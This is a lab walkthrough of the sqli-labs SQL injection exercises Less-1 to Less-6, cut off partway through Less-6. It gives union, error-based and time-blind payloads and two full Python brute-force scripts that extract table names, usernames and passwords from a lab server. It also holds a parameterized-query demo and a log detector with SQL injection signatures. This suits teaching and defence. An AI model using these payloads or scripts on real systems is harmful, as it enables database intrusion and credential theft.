Less-1:

Append id=1' to http://127.0.0.1/sqli-labs/Less-1/, that is, add a single quote ' after the normal input 1, and look at the result:

The page reports an SQL syntax error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

From this error we can see that the submitted 1' becomes '1'' LIMIT 0,1 once the SQL statement is built, with one extra ' . This is how we obtain the information we need from the error message. The next question is how to get rid of the surplus ' .
Try appending the following after id=1:
' or 1=1 --+
The SQL statement built from this becomes:
select xxxx from xxxx where id='1' or 1=1 --+' limit 0,1
and the page returns data normally.

Here we can use order by, which sorts the result of the preceding select statement. Repeated testing shows the query has three columns: order by 3 works, and anything above 3 raises an error. With
' order by 4 --+
the page shows: (error screenshot omitted)

Finally, let's look at the source code to see why the injection is possible.
The SQL statement is:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"
When the id parameter is concatenated into the SQL statement, no filtering or other processing is applied to it, so when ' or 1=1 --+ is submitted the statement built is simply
SELECT * FROM users WHERE id='1' or 1=1 --+ LIMIT 0,1
which is always true because of or 1=1.
In addition, this section introduces union injection. union combines the results of two SQL statements; the examples below show how it works. One point to stress: the two select statements on either side of the union must select the same number of columns. The difference between union all and union is that union additionally removes duplicate rows.
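To make the concatenation bug concrete, here is an added example (not code from sqli-labs or from this write-up) that rebuilds the Less-1 query in Python over an in-memory SQLite table with constructed sample rows: the concatenated form behaves exactly as the payloads above show, while a bound parameter treats the same input as a plain value. SQLite is assumed in place of MySQL; its -- comment and LIMIT 0,1 syntax match what the page uses.

```python
import sqlite3

# Constructed sample rows in the shape of the sqli-labs users table (id, username, password).
SAMPLE_USERS = [
    (1, "Dumb", "Dumb"),
    (2, "Angelina", "I-kill-you"),
    (3, "Dummy", "p@ssword"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite stand-in for the MySQL 'security' database (assumption: same three columns)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return con


def query_concatenated(con: sqlite3.Connection, user_id: str) -> list:
    """Mirrors $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1": the raw value becomes SQL text.
    Raises sqlite3.OperationalError for malformed input, just as MySQL reports a syntax error."""
    sql = "SELECT * FROM users WHERE id='" + user_id + "' LIMIT 0,1"
    return con.execute(sql).fetchall()


def query_parameterized(con: sqlite3.Connection, user_id: str) -> list:
    """Hardened form: the value is bound as a parameter and can never change the statement's shape."""
    return con.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)).fetchall()


def outcome(con: sqlite3.Connection, user_id: str, hardened: bool = False) -> tuple:
    """Run one input through either query and report what the application would see:
    ('rows', [...]) or ('error', message). The error text is what leaks the query shape on the page."""
    fn = query_parameterized if hardened else query_concatenated
    try:
        return ("rows", fn(con, user_id))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    # The same inputs the write-up sends to Less-1, run against both query styles.
    for payload in ["1", "1'", "1' or 1=1 --+", "-1' union select 1,2,3 --+", "-1' union select 1,2 --+"]:
        print(repr(payload))
        print("  concatenated :", outcome(db, payload))
        print("  parameterized:", outcome(db, payload, hardened=True))
```

The mismatched-column union ("-1' union select 1,2 --+") fails in both engines, which is the column-count rule the text stresses.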
Here we apply information_schema, building on the SQL injection basics:
Using union injection:
When the id value does not exist in the database (so we use id=-1; when the two SQL statements are combined with union, the first statement selects nothing, and the content of the second statement is what gets displayed), the front-end page shows the data from our union:
-1' union select 1,2,3 --+

From the returned values we can see that the page displays the last two columns.
Dump all databases:
-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+

The SQL statement is now:
SELECT * FROM users WHERE id='-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+ LIMIT 0,1
The database names obtained are:
information_schema,challenges,dvwa,mysql,performance_schema,security,test
Dump the current database name and all tables in the current database:
-1' union select 1,group_concat(table_name),database() from information_schema.tables where table_schema=database() --+

The SQL statement is now:
SELECT * FROM users WHERE id='-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+ LIMIT 0,1
The current database name is:
security
All table names in the current database are:
emails,referers,uagents,users
Dump all column names (field names) of the users table:
-1' union select 1,group_concat(column_name),database() from information_schema.columns where table_name='users' --+

The SQL statement is now:
SELECT * FROM users WHERE id='-1' union select 1,group_concat(column_name),database() from information_schema.columns where table_name='users' --+ LIMIT 0,1
All column names of the users table are (this query does not filter on table_schema, so columns of every table named users on the server are listed):
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password
Dump the data:
-1' union select 1,group_concat(username,'-',password),database() from users --+

The SQL statement is now:
SELECT * FROM users WHERE id='-1' union select 1,group_concat(username,'-',password),database() from users --+ LIMIT 0,1
The data dumped is:
Dumb-Dumb,Angelina-I-kill-you,Dummy-p@ssword,secure-crappy,stupid-stupidity,superman-genious,batman-mob!le,admin-admin,admin1-admin1,admin2-admin2,admin3-admin3,dhakkan-dumbo,admin4-admin4
Using error-based injection:
Same as the method used in Less-5:
?id=1' or 1= (select 1 from (select count(*),concat((select concat(username,"-",password) from users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

Less-2:
Add a single quote after the number:
?id=1'

Again we get an error returned by MySQL telling us the syntax is wrong:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
The query being executed is now:
select * from table where id=1';
so the odd number of single quotes breaks the query and an error is thrown.
From this we conclude that the query code uses an integer.
From the source code, the SQL statement is:
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
No processing is applied to the id variable.
Payloads that inject successfully include:
or 1=1
or 1=1--+
The remaining payloads are the same as in Less-1; just drop the ' used in Less-1.
Using union injection:
Show the current database name and version:
?id=-1 union select 1,database(),version()--+

Show the current database user:
?id=-1 union select 1,2,user()--+

Dump all databases:
?id=-1 union select 1,database(),group_concat(schema_name) from information_schema.schemata --+

information_schema,challenges,dvwa,mysql,performance_schema,security,test
Dump the current database name and all tables in the current database:
?id=-1 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+

emails,referers,uagents,users
Dump all column names (field names) of the users table:
?id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+

Dump the data:
?id=-1 union select 1,group_concat(username),group_concat(password) from users --+

Using error-based injection:
Similar to Less-5:
?id=-1 or 1= (select 1 from (select count(*),concat((select concat(username,"-",password) from users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Less-3:
Add a single quote after the number:
?id=1'

After injecting this we get an error like the following:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
This means the developer's query is:
select login_name,password from table where id= ('$id')
So we inject with this instead:
?id=1')--+

With this we get the username and password, and the rest of the query is commented out.
The SQL query in the source code is:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
Payloads that inject successfully include:
?id=')--+
?id=') or '1'=('1
?id=') or 1=1--+
The remaining payloads are the same as in Less-1; just add ) after the ' used in Less-1, giving ')
?id=') union select 1,2,3--+

Dump all databases:
?id=') union select 1,group_concat(schema_name),3 from information_schema.schemata --+

information_schema,challenges,dvwa,mysql,performance_schema,security,test
Dump the current database name and the table names:
?id=') union select 1,group_concat(table_name),database() from information_schema.tables where table_schema=database() --+

Dump all column names of the users table:
?id=') union select 1,group_concat(column_name),database() from information_schema.columns where table_schema=database() and table_name='users' --+

Less-4:
Finding the injection point:
We try ?id=1'

and find that no error is raised.
Next we try a double quote:

After injecting it we get an error like the following:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
So the closing sequence is a double quote plus a parenthesis.
This means the code wraps the id parameter in "" and ().
We can try:
?id=1")--+

The SQL query in the source code:
$sql="SELECT * FROM users WHERE id=("$id") LIMIT 0,1";
Payloads that inject successfully include:
?id=")--+
?id=") or 1=1 --+
?id=") or "1"=("1
The remaining payloads are the same as in Less-1; just replace the ' from Less-1 with ")
?id=") union select 1,2,3 --+

Dump all databases:
?id=") union select 1,database(),group_concat(schema_name) from information_schema.schemata --+

Dump all table names of the current database:
?id=") union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+

Dump all column names (field names) of the users table:
?id=") union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+

Less-5:
Finding the injection point:
We try ?id=1'

and get an error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
So the closing character is a single quote and this is single-quote string injection:
?id=-1' or '1'='1
?id=1' and '1'='1

The SQL query in the source code is:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
Brute-forcing through the injection point:
1. Using Burp:
Dump all databases:
?id=-1' or mid((select schema_name from information_schema.schemata limit 0,1),1,1)='a
?id=1' and mid((select schema_name from information_schema.schemata limit 0,1),1,1)='a
Either of these two blind-injection forms works.
Use Burp to brute-force the specified position step by step.

The first character of the first database name is i
Continue brute-forcing in the same way.
The second character of the first database name is
The first database name is:
information_schema
2. Brute-forcing with a Python script:
import requests
import time

# requests session used to send the probing requests:
r = requests.session()
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_='

# Brute-force the length of the current database name:
def get_database_name_length() -> int:
    print("===========正在爆破当前数据库名长度!!!================")
    print("================请耐心等待!!!======================")
    print("")
    print("")
    length = 0  # stays 0 when no guess in range matches
    for i in range(50):
        # key URL:
        url = "http://192.168.239.5:9020/Less-5/?id=-1' or length(database())={} and sleep(0.1) and '1'='1".format(i)
        start_time = time.time()  # time before the request
        r.get(url)  # elapsed time is measured once the request returns
        if time.time() - start_time > 1:  # a response slower than 1 second means the length guess matched
            length = i
            break
    print("============="+"当前数据库的长度为:{}".format(length))
    print("")
    print("")
    return length

# Brute-force the current database name:
def get_database_name(length):
    print("===========正在爆破当前数据库名!!!====================")
    print("================请耐心等待!!!=======================")
    database_name = ''
    for i in range(1, length+1):  # substr positions start at 1; range excludes the upper bound, hence +1
        for j in range(1,128):  # ASCII codes 1~127; range excludes the upper bound, hence 128
            url = "http://192.168.239.5:9020/Less-5/?id=-1' or ascii(substr((database()),{},1))={} and sleep(0.1) and '1'='1".format(i,j)
            start_time = time.time()
            r.get(url)
            if time.time() - start_time > 1:
                database_name = database_name+chr(j)
                print(database_name)
                break
    print("============="+"当前数据库名为:"+database_name)
    print("")
    print("")
    return database_name

# Brute-force the number of tables in the current database:
def get_table_name_count() -> int:
    print("=========正在爆破当前数据库下的表个数!!!===============")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    count = 0
    for i in range(50):
        # key URL:
        url = "http://192.168.239.5:9020/Less-5/?id=-1' or (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(0.1) and '1'='1".format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("============="+"当前数据库下的数据表的个数为:{}".format(count))
    print("")
    print("")
    return count

# Brute-force the length of each table name in the current database:
def get_table_name_length(count):
    print("=========正在爆破当前数据库下的每张表名的长度!!!=========")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    for i in range(count):
        length = 0
        for j in range(1, 50):
            url = "http://192.168.239.5:9020/Less-5/?id=-1' or length((select table_name from information_schema.tables where table_schema=database() limit {},1))={} and sleep(0.1) and '1'='1".format(i,j)
            start_time = time.time()
            r.get(url)
            if time.time() - start_time > 1:
                length = j
                break
        print("第{}张表的长度为:".format(i+1)+str(length))
    print("=========以上为当前数据库下的每张表名的长度")
    print("")
    print("")
    return 0

# Brute-force every table name in the current database:
def get_table_name(count):
    print("=========正在爆破当前数据库下的所有表名!!!=========")
    print("================请耐心等待!!!=======================")
    table_name = ''
    for i in range(count):
        for j in range(1, 50):  # character positions start at 1
            for k in range(1,128):
                url = "http://192.168.239.5:9020/Less-5/?id=-1' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(0.1) and '1'='1".format(i,j,k)
                start_time = time.time()
                r.get(url)
                if time.time() - start_time > 1:
                    table_name += chr(k)
                    print(table_name)
                    break
        print("第{}张数据表名为:".format(i+1)+table_name)
        table_name=''
    print("=========以上为当前数据库下的所有数据表名")
    print("")
    print("")
    return 0

# Brute-force the number of columns in the users table of the current database:
def get_column_name_count() -> int:
    print("======正在爆破当前数据库下的users表的所有字段个数!!!======")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    count = 0
    for i in range(50):
        url = "http://192.168.239.5:9020/Less-5/?id=-1' or (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')={} and sleep(0.1) and '1'='1".format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前数据库下的users表的所有字段个数为:{}".format(count))
    print("")
    print("")
    return count

# Brute-force every column name of the users table in the current database:
def get_column_name(count):
    print("======正在爆破当前数据库下的users表的所有字段名!!!=======")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    column_name = ''
    for i in range(count):
        for j in range(1, 50):
            for k in range(1,128):
                url = "http://192.168.239.5:9020/Less-5/?id=-1' or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit {},1),{},1))={} and sleep(0.1) and '1'='1".format(i,j,k)
                start_time = time.time()
                r.get(url)
                if time.time() - start_time > 1:
                    column_name += chr(k)
                    print(column_name)
                    break
        print("第{}个字段名为:".format(i + 1) + column_name)
        column_name = ''
    print("=========以上为当前数据库下的users表的所有字段名")
    print("")
    print("")
    return 0

# Brute-force the number of rows in the users table:
def get_users_count() -> int:
    print("======正在爆破当前users表有多少条数据记录!!!=======")
    print("================请耐心等待!!!=======================")
    count = 0
    for i in range(100):
        url = "http://192.168.239.5:9020/Less-5/?id=-1' or (select count(*) from users )={} and sleep(0.1) and '1'='1".format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前users表有{}条数据记录".format(count))
    print("")
    print("")
    return count

# Brute-force the username and password fields of the users table in the current database:
def get_username(count):
    print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
    print("=============================请耐心等待!!!===============================")
    values1 = ''
    values2 = ''
    values3 = ''
    for i in range(count):
        for j in range(1, 50):
            for k in range(1,128):
                url1 = "http://192.168.239.5:9020/Less-5/?id=-1' or ascii(substr((select id from users limit {},1),{},1))={} and sleep(0.1) and '1'='1".format(i,j,k)
                url2 = "http://192.168.239.5:9020/Less-5/?id=-1' or ascii(substr((select username from users limit {},1),{},1))={} and sleep(0.1) and '1'='1".format(i,j,k)
                url3 = "http://192.168.239.5:9020/Less-5/?id=-1' or ascii(substr((select password from users limit {},1),{},1))={} and sleep(0.1) and '1'='1".format(i,j,k)
                start_time = time.time()
                r.get(url1)
                if time.time() - start_time > 1:
                    values1 += chr(k)
                start_time = time.time()
                r.get(url2)
                if time.time() - start_time > 1:
                    values2 += chr(k)
                start_time = time.time()
                r.get(url3)
                if time.time() - start_time > 1:
                    values3 += chr(k)
        print("===第{}条记录的id值为:{},username的值为:{},password的值为:{}".format(i+1,values1,values2,values3))
        values1 = ''
        values2 = ''
        values3 = ''
    print("=====以上为users表中所有数据========")
    print("")
    print("")
    return 0

# Call the functions above:
if __name__ == '__main__':
    get_database_name(get_database_name_length())  # database name length, then the database name
    get_table_name_length(get_table_name_count())  # table count, then the length of each table name
    get_table_name(get_table_name_count())  # table count, then every table name
    get_column_name(get_column_name_count())  # column count of users, then every column name of users
    get_username(get_users_count())  # row count of users, then the id, username and password of each row
Optimized version of the last function, which brute-forces all the field contents:
# Brute-force the username and password fields of the users table in the current database:
def get_username(count):
    print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
    print("=============================请耐心等待!!!===============================")
    values = ''
    for i in range(count):
        for j in range(1, 50):  # character positions start at 1
            for k in range(1,128):
                url1 = "http://192.168.239.5:9020/Less-5/?id=-1' or ascii(substr((select concat(id,'---',username,'---',password) from users limit {},1),{},1))={} and sleep(0.1) and '1'='1".format(i,j,k)
                # id, username and password are separated by '---' here, so one probe per character covers all three fields
                start_time = time.time()
                r.get(url1)
                if time.time() - start_time > 1:
                    values += chr(k)
                    print(values)
                    break
        print("===第{}条记录的id值为:".format(i+1)+values)
        values = ''
    print("=====以上为users表中所有数据========")
    print("")
    print("")
    return 0
Brute-force output: (screenshots omitted)

Output of the optimized code: (screenshot omitted)

It runs much faster!!!
and the progress is clearly visible in the output!
Using error-based injection:
Error-based injection can give us the information we want:
1. First method:
Get the database:
?id=-1' or 1= (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

security
Get the tables:
?id=-1' or 1= (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

Adjust the starting offset of limit to get the first table name: emails
and the next one in turn: referers
?id=-1' or 1= (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

http://192.168.239.5:9020/Less-5/?id=-1' or 1= (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

?id=-1' or 1= (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

Get the column names:
?id=-1' or 1= (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

?id=-1' or 1= (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

?id=-1' or 1= (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

Get the field values:
?id=-1' or 1= (select 1 from (select count(*),concat((select concat(username,'-',password) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

?id=-1' or 1= (select 1 from (select count(*),concat((select concat(username,'-',password) from users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

?id=-1' or 1= (select 1 from (select count(*),concat((select concat(username,'-',password) from users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

Continuing in the same way, all the data can be obtained!!
2. Second method:
?id=-1' or (select extractvalue(1,concat(0x7e,(select database())))) and '1'='1

Usage is similar to the first method!!
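From the detection side, the traffic produced by the time-based scripts and the error-based payloads in this level is very recognisable: many requests from one address whose id parameter carries sleep() together with ascii(substr(...)) or ascii(mid(...)) probes, of which only the correct guesses are slow, plus the floor(rand(0)*2) ... group by and extractvalue() forms. The following is an added example (not part of this write-up) that runs those signatures over a few constructed access-log lines; the log layout, with a trailing rt= request-time field, is assumed.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Signatures for the techniques used on this page, matched on the URL-decoded query string.
SIGNATURES = {
    "time_blind": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "char_probe": re.compile(r"ascii\s*\(\s*(substr|mid)\s*\(", re.I),
    "error_based": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by|\b(extractvalue|updatexml)\s*\(", re.I),
    "union_schema": re.compile(r"union\s+(all\s+)?select.*information_schema", re.I),
}

# Assumed log layout: <ip> - - [<time>] "<method> <path> HTTP/x" <status> <bytes> rt=<seconds>
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-) rt=([\d.]+)$')

# Constructed sample lines: two benign lookups from one client, then the page's union, time-based
# and error-based payloads from another. Only the two time-based probes whose guess was right are slow.
SAMPLE_LOG = """\
192.168.0.50 - - [10/Oct/2023:12:00:01 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 1200 rt=0.004
192.168.0.50 - - [10/Oct/2023:12:00:02 +0000] "GET /Less-1/?id=2 HTTP/1.1" 200 1198 rt=0.003
192.168.0.77 - - [10/Oct/2023:12:00:05 +0000] "GET /Less-1/?id=-1%27%20union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata%20--+ HTTP/1.1" 200 1350 rt=0.006
192.168.0.77 - - [10/Oct/2023:12:00:09 +0000] "GET /Less-5/?id=-1%27%20or%20ascii(substr((database()),1,1))=115%20and%20sleep(0.1)%20and%20%271%27=%271 HTTP/1.1" 200 720 rt=1.31
192.168.0.77 - - [10/Oct/2023:12:00:10 +0000] "GET /Less-5/?id=-1%27%20or%20ascii(substr((database()),2,1))=101%20and%20sleep(0.1)%20and%20%271%27=%271 HTTP/1.1" 200 720 rt=1.29
192.168.0.77 - - [10/Oct/2023:12:00:11 +0000] "GET /Less-5/?id=-1%27%20or%20ascii(substr((database()),3,1))=97%20and%20sleep(0.1)%20and%20%271%27=%271 HTTP/1.1" 200 720 rt=0.005
192.168.0.77 - - [10/Oct/2023:12:00:15 +0000] "GET /Less-5/?id=-1%27%20or%201=%20(select%201%20from%20(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20%271%27=%271 HTTP/1.1" 200 900 rt=0.010
192.168.0.77 - - [10/Oct/2023:12:00:16 +0000] "GET /Less-5/?id=-1%27%20or%20(select%20extractvalue(1,concat(0x7e,(select%20database()))))%20and%20%271%27=%271 HTTP/1.1" 200 900 rt=0.008
"""


def parse_line(line: str):
    """Split one log line into fields; the path is URL-decoded so encoded quotes and spaces match the signatures."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status, _size, rt = m.groups()
    return {"ip": ip, "time": ts, "method": method, "path": unquote_plus(path),
            "status": int(status), "rt": float(rt)}


def classify(decoded_path: str) -> list:
    """Names of every signature that fires on the decoded request path."""
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded_path)]


def analyze(log_text: str, slow_threshold: float = 1.0) -> dict:
    """Per-client summary: request count, signature hit counts, and how many time-based probes were slow.
    slow_threshold mirrors the 1-second cut-off the scripts above use to recognise a correct guess."""
    findings = defaultdict(lambda: {"requests": 0, "hits": Counter(), "slow_probes": 0})
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        entry = findings[rec["ip"]]
        entry["requests"] += 1
        tags = classify(rec["path"])
        entry["hits"].update(tags)
        if "time_blind" in tags and rec["rt"] >= slow_threshold:
            entry["slow_probes"] += 1
    return dict(findings)


def suspicious_clients(findings: dict) -> list:
    """Clients with at least one signature hit, sorted for stable reporting."""
    return sorted(ip for ip, f in findings.items() if f["hits"])


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip in suspicious_clients(result):
        f = result[ip]
        print(f"{ip}: {f['requests']} requests, hits={dict(f['hits'])}, slow time-based probes={f['slow_probes']}")
```

A real run of the Less-5 script produces thousands of such probes per table, so the per-client volume of char_probe hits alone is a strong signal even before response times are considered.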
Less-6:
Finding the injection point:
We try ?id=1'

and find that no error is raised.
Next we try ?id=1"

and get an error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1
So the closing character is a double quote and this is double-quote string injection:
?id=-1" or "1"="1
?id=1" and "1"="1

The SQL query in the source code is:
$sql='SELECT * FROM users WHERE id="$id" LIMIT 0,1';
The difference between Less-6 and Less-5 is that Less-6 processes the id parameter when it is passed to the server, which can be seen in the source code.
So our strategy for this level is the same as for Less-5; we only need to replace ' with ".
Brute-forcing through the injection point:
Writing a script in Python:
import requests
import time

# requests session used to send the probing requests:
r = requests.session()
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_='

# Brute-force the length of the current database name:
def get_database_name_length() -> int:
    print("===========正在爆破当前数据库名长度!!!================")
    print("================请耐心等待!!!======================")
    print("")
    print("")
    length = 0  # stays 0 when no guess in range matches
    for i in range(50):
        # key URL:
        url = 'http://192.168.239.5:9020/Less-6/?id=-1" or length(database())={} and sleep(1) and "1"="1'.format(i)
        start_time = time.time()  # time before the request
        r.get(url)  # elapsed time is measured once the request returns
        if time.time() - start_time > 1:  # a response slower than 1 second means the length guess matched
            length = i
            break
    print("============="+"当前数据库的长度为:{}".format(length))
    print("")
    print("")
    return length

# Brute-force the current database name:
def get_database_name(length):
    print("===========正在爆破当前数据库名!!!====================")
    print("================请耐心等待!!!=======================")
    database_name = ''
    for i in range(1, length+1):  # substr positions start at 1; range excludes the upper bound, hence +1
        for j in range(1,128):  # ASCII codes 1~127; range excludes the upper bound, hence 128
            url = 'http://192.168.239.5:9020/Less-6/?id=-1" or ascii(substr((database()),{},1))={} and sleep(0.1) and "1"="1'.format(i,j)
            start_time = time.time()
            r.get(url)
            if time.time() - start_time > 1:
                database_name = database_name+chr(j)
                print(database_name)
                break
    print("============="+"当前数据库名为:"+database_name)
    print("")
    print("")
    return database_name

# Brute-force the number of tables in the current database:
def get_table_name_count() -> int:
    print("=========正在爆破当前数据库下的表个数!!!===============")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    count = 0
    for i in range(50):
        # key URL:
        url = 'http://192.168.239.5:9020/Less-6/?id=-1" or (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(0.1) and "1"="1'.format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("============="+"当前数据库下的数据表的个数为:{}".format(count))
    print("")
    print("")
    return count

# Brute-force the length of each table name in the current database:
def get_table_name_length(count):
    print("=========正在爆破当前数据库下的每张表名的长度!!!=========")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    for i in range(count):
        length = 0
        for j in range(1, 50):
            url = 'http://192.168.239.5:9020/Less-6/?id=-1" or length((select table_name from information_schema.tables where table_schema=database() limit {},1))={} and sleep(0.1) and "1"="1'.format(i,j)
            start_time = time.time()
            r.get(url)
            if time.time() - start_time > 1:
                length = j
                break
        print("第{}张表的长度为:".format(i+1)+str(length))
    print("=========以上为当前数据库下的每张表名的长度")
    print("")
    print("")
    return 0

# Brute-force every table name in the current database:
def get_table_name(count):
    print("=========正在爆破当前数据库下的所有表名!!!=========")
    print("================请耐心等待!!!=======================")
    table_name = ''
    for i in range(count):
        for j in range(1, 50):  # character positions start at 1
            for k in range(1,128):
                url = 'http://192.168.239.5:9020/Less-6/?id=-1" or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(0.1) and "1"="1'.format(i,j,k)
                start_time = time.time()
                r.get(url)
                if time.time() - start_time > 1:
                    table_name += chr(k)
                    print(table_name)
                    break
        print("第{}张数据表名为:".format(i+1)+table_name)
        table_name=''
    print("=========以上为当前数据库下的所有数据表名")
    print("")
    print("")
    return 0

# Brute-force the number of columns in the users table of the current database:
def get_column_name_count() -> int:
    print("======正在爆破当前数据库下的users表的所有字段个数!!!======")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    count = 0
    for i in range(50):
        url = 'http://192.168.239.5:9020/Less-6/?id=-1" or (select count(column_name) from information_schema.columns where table_schema=database() and table_name="users")={} and sleep(0.1) and "1"="1'.format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前数据库下的users表的所有字段个数为:{}".format(count))
    print("")
    print("")
    return count

# Brute-force every column name of the users table in the current database:
def get_column_name(count):
    print("======正在爆破当前数据库下的users表的所有字段名!!!=======")
    print("================请耐心等待!!!=======================")
    print("")
    print("")
    column_name = ''
    for i in range(count):
        for j in range(1, 50):
            for k in range(1,128):
                url = 'http://192.168.239.5:9020/Less-6/?id=-1" or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit {},1),{},1))={} and sleep(0.1) and "1"="1'.format(i,j,k)
                start_time = time.time()
                r.get(url)
                if time.time() - start_time > 1:
                    column_name += chr(k)
                    print(column_name)
                    break
        print("第{}个字段名为:".format(i + 1) + column_name)
        column_name = ''
    print("=========以上为当前数据库下的users表的所有字段名")
    print("")
    print("")
    return 0

# Brute-force the number of rows in the users table:
def get_users_count() -> int:
    print("======正在爆破当前users表有多少条数据记录!!!=======")
    print("================请耐心等待!!!=======================")
    count = 0
    for i in range(100):
        url = 'http://192.168.239.5:9020/Less-6/?id=-1" or (select count(*) from users )={} and sleep(0.1) and "1"="1'.format(i)
        start_time = time.time()
        r.get(url)
        if time.time() - start_time > 1:
            count = i
            break
    print("=============" + "当前users表有{}条数据记录".format(count))
    print("")
    print("")
    return count

# Brute-force the username and password fields of the users table in the current database:
def get_username(count):
    print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
    print("=============================请耐心等待!!!===============================")
    values1 = ''
    values2 = ''
    values3 = ''
    for i in range(count):
        for j in range(1, 50):
            for k in range(1,128):
                url1 = 'http://192.168.239.5:9020/Less-6/?id=-1" or ascii(substr((select id from users limit {},1),{},1))={} and sleep(0.1) and "1"="1'.format(i,j,k)
                url2 = 'http://192.168.239.5:9020/Less-6/?id=-1" or ascii(substr((select username from users limit {},1),{},1))={} and sleep(0.1) and "1"="1'.format(i,j,k)
                url3 = 'http://192.168.239.5:9020/Less-6/?id=-1" or ascii(substr((select password from users limit {},1),{},1))={} and sleep(0.1) and "1"="1'.format(i,j,k)
                start_time = time.time()
                r.get(url1)
